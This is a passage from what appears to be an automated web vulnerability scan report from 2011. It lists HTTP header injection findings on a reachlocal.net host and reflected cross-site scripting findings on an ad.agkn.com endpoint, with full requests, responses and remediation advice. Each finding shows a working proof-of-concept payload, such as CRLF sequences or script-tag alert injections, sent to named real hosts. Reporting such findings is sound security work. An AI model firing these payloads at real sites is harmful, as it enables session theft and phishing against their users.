1.46. http://utdi.reachlocal.net/images/productpic_avaya1.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/productpic_avaya1.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 36765%0d%0acd72234d30c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /36765%0d%0acd72234d30c/productpic_avaya1.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:01 GMT
Server: Apache
Location: http://utdi.com/36765
cd72234d30c/productpic_avaya1.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/36765
cd72234d30c/productpic_a
...[SNIP]...
|
1.47. http://utdi.reachlocal.net/images/spacer.gif [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/spacer.gif |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload d288a%0d%0a00c7c1b4fe2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d288a%0d%0a00c7c1b4fe2/spacer.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:49 GMT
Server: Apache
Location: http://utdi.com/d288a
00c7c1b4fe2/spacer.gif
Vary: Accept-Encoding
Content-Length: 298
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d288a
00c7c1b4fe2/spacer.gif">
...[SNIP]...
|
2. Cross-site scripting (reflected)
previous
next
There are 135 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://ad.agkn.com/iframe!t=1129! [clk1 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ad.agkn.com |
| Path: |
/iframe!t=1129! |
Issue detail
The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1329d"><script>alert(1)</script>68ab14b7166 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=3523644183486696711329d"><script>alert(1)</script>68ab14b7166&mt_id=126412&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:53 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKBAAAAAAkBArwBATUBC%2FABoAADAUIBBQABQwEFAAFBAQUAAQK8fhdn5xh1LAY%2FAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:53 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:52 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=3523644183486696711329d"><script>alert(1)</script>68ab14b7166&mt_id=126412&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=462918736?imid=1686570677704590911&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Cons
...[SNIP]...
|
2.2. http://ad.agkn.com/iframe!t=1129! [mt_adid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ad.agkn.com |
| Path: |
/iframe!t=1129! |
Issue detail
The value of the mt_adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3783"><script>alert(1)</script>e292a848299 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060d3783"><script>alert(1)</script>e292a848299&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKCAAAAAA0BArwBATUBC%2FAB4AADAUIBBwABQwEHAAFBAQcAAQK8fhIojCjOb%2FrIAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:53 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060d3783"><script>alert(1)</script>e292a848299&redirect=http://ad.agkn.com/interaction!che=83841845?imid=1308449798641154760&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-
...[SNIP]...
|
2.3. http://ad.agkn.com/iframe!t=1129! [mt_id parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ad.agkn.com |
| Path: |
/iframe!t=1129! |
Issue detail
The value of the mt_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4a4"><script>alert(1)</script>52debf145d7 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=1264127c4a4"><script>alert(1)</script>52debf145d7&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKCAAAAAAsBArwBATUBC%2FABwAADAUIBBgABQwEGAAFBAQYAAQK8fniLvnViAKPrAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:53 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=1264127c4a4"><script>alert(1)</script>52debf145d7&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=2040497228?imid=8686245717678793707&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/
...[SNIP]...
|
2.4. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ad.agkn.com |
| Path: |
/iframe!t=1129! |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b84a"><script>alert(1)</script>edb5176eb5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&9b84a"><script>alert(1)</script>edb5176eb5f=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:55 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKDAAAAABEBArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjH%2FMgJ0ufACAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:55 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:54 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&9b84a"><script>alert(1)</script>edb5176eb5f=1http://ad.agkn.com/interaction!che=1716110508?imid=3602653213049352194&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se
...[SNIP]...
|
2.5. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ad.agkn.com |
| Path: |
/iframe!t=1129! |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf115"%3balert(1)//760f2f14d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf115";alert(1)//760f2f14d5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&bf115"%3balert(1)//760f2f14d5b=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:55 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKDAAAAABMBArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8flg7HoVyhy11AAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:55 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:55 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&bf115";alert(1)//760f2f14d5b=1http://ad.agkn.com/interaction!che=1802253544?imid=6357708857464532341&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se
...[SNIP]...
|
2.6. http://ad.agkn.com/iframe!t=1129! [redirect parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ad.agkn.com |
| Path: |
/iframe!t=1129! |
Issue detail
